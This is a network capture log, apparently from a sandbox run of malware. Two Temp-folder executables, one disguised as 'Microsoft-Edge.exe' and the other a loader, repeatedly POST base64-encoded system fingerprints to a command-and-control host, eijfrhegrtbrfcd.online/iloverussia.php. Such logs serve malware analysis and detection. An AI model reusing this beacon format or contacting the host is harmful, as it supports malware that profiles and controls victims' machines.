Timestamp: 2024-09-27 15:42:08 UTC, Bytes transferred: 621, Direction: OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 626, Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unOH4EbE3TFmjw%2B3pYYBVv8LZfdcjO2zKYSFXW8DVXV68laPhVWQSRBeIanmUMecYATIeSuxI%2Fd9%2FMjo%2FniA%2BAqHNRuUXpkYE1DBCiK8UouYJ2imWS51O551yc4xwxBAmhfzYrwfRJTI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a184a47432b-EWR

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 7, Direction: IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 5, Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49747
Destination IP: 172.67.187.100
Destination Port: 443
PID: 7636
Process: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 621, Direction: OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 628, Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRuJH0cGoQQ6wfwLbWpDZcYtUA%2Bg6CjFrqi0p2VsnUGiusv7VueJJXzi%2BVsIMptbCqSdQYR6AL%2F8u%2BzwIoCRkbebyeFLrhQY8MV%2F4VnRaXmDLebmxR1JR%2BSKUw2feNkG96Uoj4LmCekJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a1d09517c78-EWR

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 7, Direction: IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 5, Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.4
Source Port: 49748
Destination IP: 172.67.187.100
Destination Port: 443
PID: 1748
Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp: 2024-09-27 15:42:09 UTC, Bytes transferred: 621, Direction: OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp: 2024-09-27 15:42:10 UTC, Bytes transferred: 622, Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LrdrsqxykRBHWj3sCjinrVfuHFoXw7wW3YgTi3ic3TB1YWvTLCJM4xXCzdk3r9kmq4UuLwV1pluzN%2FInd6XVeKcTKQ%2F%2Fg4WXwH24si9bHvVdl4kXgrVMKYPm7ODYjXOsRd3XNRMuP8Y"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a204c0a4399-EWR

Timestamp: 2024-09-27 15:42:10 UTC, Bytes transferred: 7, Direction: IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp: 2024-09-27 15:42:10 UTC, Bytes transferred: 5, Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5
Source IP: 192.168.2.4
Source Port: 49750
Destination IP: 172.67.187.100
Destination Port: 443
PID: 7636
Process: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 621, Direction: OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 626, Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FPpckVTTOnBjHvV3mJC2z%2FMBJSFb9kvoAFgr%2BblNstZarw4OHTmoUfuSVP8Gyv7YM1QPiW0c9zX%2F5k2b3HghZus5h3kOSjQt5a8Oq8DHlVKU%2FLHtmv3VjLX5RxxHrzslGEWftn1cWkS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a27cd7d439a-EWR

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 7, Direction: IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 5, Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 6
Source IP: 192.168.2.4
Source Port: 49751
Destination IP: 172.67.187.100
Destination Port: 443
PID: 1748
Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 621, Direction: OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 620, Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cae6GnVlSMLYc%2BiYm1UDP1ImO3tHteRWe8xkxBxy8zzZwbPSJmtiIszniKXgfPVO7iTZ8vj8oFr%2BiYsmT81pFEfQa0SgYYQfbumIy8g1Q0TGzJOuCzZlZOEQi8Z3n1VvZgUfJZEFrqJk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a27cfe98c89-EWR

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 7, Direction: IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp: 2024-09-27 15:42:11 UTC, Bytes transferred: 5, Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.4
Source Port: 49754
Destination IP: 172.67.187.100
Destination Port: 443
PID: 1748
Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp: 2024-09-27 15:42:12 UTC, Bytes transferred: 621, Direction: OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp: 2024-09-27 15:42:12 UTC, Bytes transferred: 660, Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JgqjbtqWuOgqtOJHAk%2BHGmTaWZ%2Fjk4UKxvvCbL8SDLQeEoavRmyRAtW8tn8Ot%2F6Szxz%2BygX60MrFEyzmj0%2FxXUaTt4Dmq71hY%2Fe5VaADZLaem%2FOv0HnJpErH9NTwNI9AY3bfmZOV7nAA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a2fd9434223-EWR
alt-svc: h3=":443"; ma=86400

Timestamp: 2024-09-27 15:42:12 UTC, Bytes transferred: 7, Direction: IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp: 2024-09-27 15:42:12 UTC, Bytes transferred: 5, Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49755 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:12 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:12 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:12 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUSKyITOw1UC32FkDrisax0SCxepZkmbYnGWY%2FDP%2BBl0R453u9NQCzVpW0j2EH%2FpYDrz%2Fig0gLe%2FvbvzsdN1J9DVPe2TXuPgGQwJeKd12KPs0iFUee7lL7OJlsSLpcOFXLm1lPFQGXhk"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a2fcf93434a-EWR
2024-09-27 15:42:12 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49757 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:13 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:14 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:14 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnlCE%2FtMMRbW1%2BT0wcab1exauqCXtVQlaFQMezD4qCQ%2BnevDFbQ0BJDyRoct%2FtWEtWy9kdJ2CmZy1Zt0b9xEkP6Rk7lLcDo3AMESEtDR3VOvKbg21Kgwv%2FQTWQQbdSCAyaxlw2q2g04Y"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a37bed68c3f-EWR
2024-09-27 15:42:14 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49758 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:13 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:14 UTC | 622 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:14 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HkBdN6PD9BVGUPXO8ckIAwQ%2FIyYoW%2F2d5xjm5iz4k0aX5W9X2ulAAbYzze%2BgkEchIJXCntzKn3TDVCcvQDEYYQpMCfu6ba0mlNFJxvpDYtF0y40fuQUFLWu7T6wVoKChj6Z9qJjBC5x"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a37cdfa0f78-EWR
2024-09-27 15:42:14 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49760 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:14 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:15 UTC | 638 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:15 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BHKWZW6cZohcVLe%2Fs6s%2ByOFaLByn%2Bc%2Bz7t2GB%2Bd6bNGuHI6K1JL%2BjrcSin6D0AqTz6ulxG%2Fr7C5zJH3%2F6RQZwu8eAO1wD%2FWfMfdNFWuZRHOJJt87R3ki%2BmFyH2laCvY6SZt2zgiEG60"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a400bf24265-EWR
2024-09-27 15:42:15 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49761 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:15 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:15 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:15 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbkIH0%2BdootVIGjwIb75Zuj8NMFyEfU8LFaJC5vjdIhldx5Pll8Y8QbHKeRy14BQ8%2BelMi3996rcP4ECMaV3wVlnI0DZpC%2F%2B61W7OoosAB144s6r6DtkZCvrnjk0q7o5OOSa%2BpTAeGg0"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a406acf78dc-EWR
2024-09-27 15:42:15 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49763 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:16 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:16 UTC | 620 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:16 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SUUKkebWmwnawJ7PyGLFxBeu4kqeuIx5fOw6uFdJKIN4X2Ify7l0t68inf3yO5oR2Ph7peeRIcXyp7u%2BgTa1CYftxoeE8pHIl8tC0RM10nxVqUXqBu22yb6G6GZyv%2FvsisBM747Onv1g"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a490c8b7d1a-EWR
2024-09-27 15:42:16 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
